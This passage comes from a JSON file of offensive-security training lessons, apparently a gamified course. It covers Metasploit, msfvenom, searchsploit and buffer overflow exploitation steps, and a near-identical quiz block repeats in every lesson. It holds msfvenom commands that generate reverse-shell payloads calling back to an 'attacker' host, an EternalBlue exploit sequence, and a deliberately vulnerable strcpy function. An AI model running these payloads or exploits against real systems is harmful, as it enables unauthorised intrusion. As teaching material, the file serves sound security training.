Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-msfvenom-payloads","cat":"Exploitation","title":"MSFVenom Payload Generation","diff":1,"xp":75,"intro":"Generate payloads in any format for any platform.","sections":[{"type":"text","content":"msfvenom creates: EXE, ELF, DLL, PHP, Python, PowerShell, and raw shellcode for Windows, Linux, Mac."},{"type":"code","lang":"bash","content":"# Windows EXE\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f exe -o shell.exe\n# Linux ELF\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f elf -o shell\n# PHP\nmsfvenom -p php/reverse_php LHOST=attacker LPORT=4444 -f raw > shell.php"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"msfvenom -f exe produces...","opts":["Raw shellcode","A Windows executable","A Linux binary","A PHP script"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-msfconsole-basics","cat":"Exploitation","title":"Metasploit Console Basics","diff":1,"xp":75,"intro":"Search, configure, and run Metasploit exploit modules.","sections":[{"type":"text","content":"msfconsole: search for exploits by CVE or keyword, set options (RHOSTS, LHOST, payload), and run."},{"type":"code","lang":"bash","content":"msfconsole\nmsf6> search eternalblue\nmsf6> use exploit/windows/smb/ms17_010_eternalblue\nmsf6> set RHOSTS target\nmsf6> set LHOST attacker\nmsf6> exploit"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"The 'use' command in Metasploit...","opts":["Runs the exploit","Selects a module to configure","Searches for exploits","Shows help"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-searchsploit","cat":"Exploitation","title":"SearchSploit Exploit Search","diff":1,"xp":50,"intro":"Search the Exploit-DB offline database from the command line.","sections":[{"type":"text","content":"searchsploit searches a local copy of Exploit-DB. Find exploits by software name, version, and platform."},{"type":"code","lang":"bash","content":"searchsploit apache 2.4.49\nsearchsploit linux kernel 5.8 privilege\nsearchsploit -m 50383  # copy exploit to current dir\nsearchsploit --nmap scan.xml  # search from nmap results"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"searchsploit searches...","opts":["The internet","A local offline copy of Exploit-DB","Metasploit modules","GitHub"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-buffer-overflow-intro","cat":"Exploitation","title":"Buffer Overflow Introduction","diff":2,"xp":150,"intro":"Understand how buffer overflows work at the memory level.","sections":[{"type":"text","content":"A buffer overflow writes past the allocated buffer, overwriting adjacent memory. On the stack, this can overwrite the return address, redirecting execution."},{"type":"code","lang":"c","content":"// Vulnerable function:\nvoid vuln(char *input) {\n  char buffer[64];  // 64 bytes allocated\n  strcpy(buffer, input);  // no bounds check!\n}\n// If input > 64 bytes:\n// Overwrites saved EBP, then return address\n// Attacker controls where execution goes next"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Buffer overflows overwrite...","opts":["The file system","Adjacent memory including the return address on the stack","Network packets","The CPU cache"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-bof-offset","cat":"Exploitation","title":"Finding the Buffer Overflow Offset","diff":2,"xp":150,"intro":"Determine the exact byte offset to control the return address.","sections":[{"type":"text","content":"Use pattern_create to generate a unique pattern, crash the program, find the pattern value in EIP, and calculate the offset."},{"type":"code","lang":"bash","content":"# Generate unique pattern\nmsf-pattern_create -l 500\n# Send pattern, crash, note EIP value\n# Find offset\nmsf-pattern_offset -l 500 -q 41386141\n# Or with pwntools:\nfrom pwn import *\noffset = cyclic_find(0x41386141)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"The offset tells you...","opts":["The pattern length","Exactly how many bytes before you overwrite the return address","The memory layout","The shellcode size"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-bof-bad-chars","cat":"Exploitation","title":"Bad Character Analysis","diff":2,"xp":150,"intro":"Identify bytes that get mangled and can't be in your shellcode.","sections":[{"type":"text","content":"Send all 256 byte values (0x00-0xff) and check which ones get modified, truncated, or filtered. These are bad characters that must be avoided."},{"type":"code","lang":"bash","content":"# Generate all bytes\npython3 -c 'import sys; sys.stdout.buffer.write(bytes(range(1,256)))' > badchars.bin\n# Send as payload, examine in debugger\n# Compare what you sent vs what appears in memory\n# Common bad chars: x00 (null), x0a (newline), x0d (CR)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why remove bad characters from shellcode?","opts":["They're slow","They get modified/truncated by the application, breaking the shellcode","They're too large","They're encrypted"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-bof-jmp-esp","cat":"Exploitation","title":"Finding JMP ESP for Shellcode Execution","diff":2,"xp":150,"intro":"Locate a JMP ESP gadget to redirect execution to your shellcode.","sections":[{"type":"text","content":"After overwriting the return address, you need it to point somewhere that jumps to your shellcode. JMP ESP (xffxe4) in a loaded module does this."},{"type":"code","lang":"bash","content":"# In Immunity Debugger with mona:\n!mona jmp -r esp -cpb 'x00'\n# Or ROPgadget:\nROPgadget --binary vuln --only 'jmp|call' | grep esp\n# The address must not contain bad characters"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"JMP ESP is needed because...","opts":["ESP is always zero","ESP points to the top of the stack where shellcode lands after the return","ESP is encrypted","ESP contains the password"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-nop-sled","cat":"Exploitation","title":"NOP Sled Technique","diff":1,"xp":75,"intro":"Increase the chance of hitting your shellcode with a landing zone of 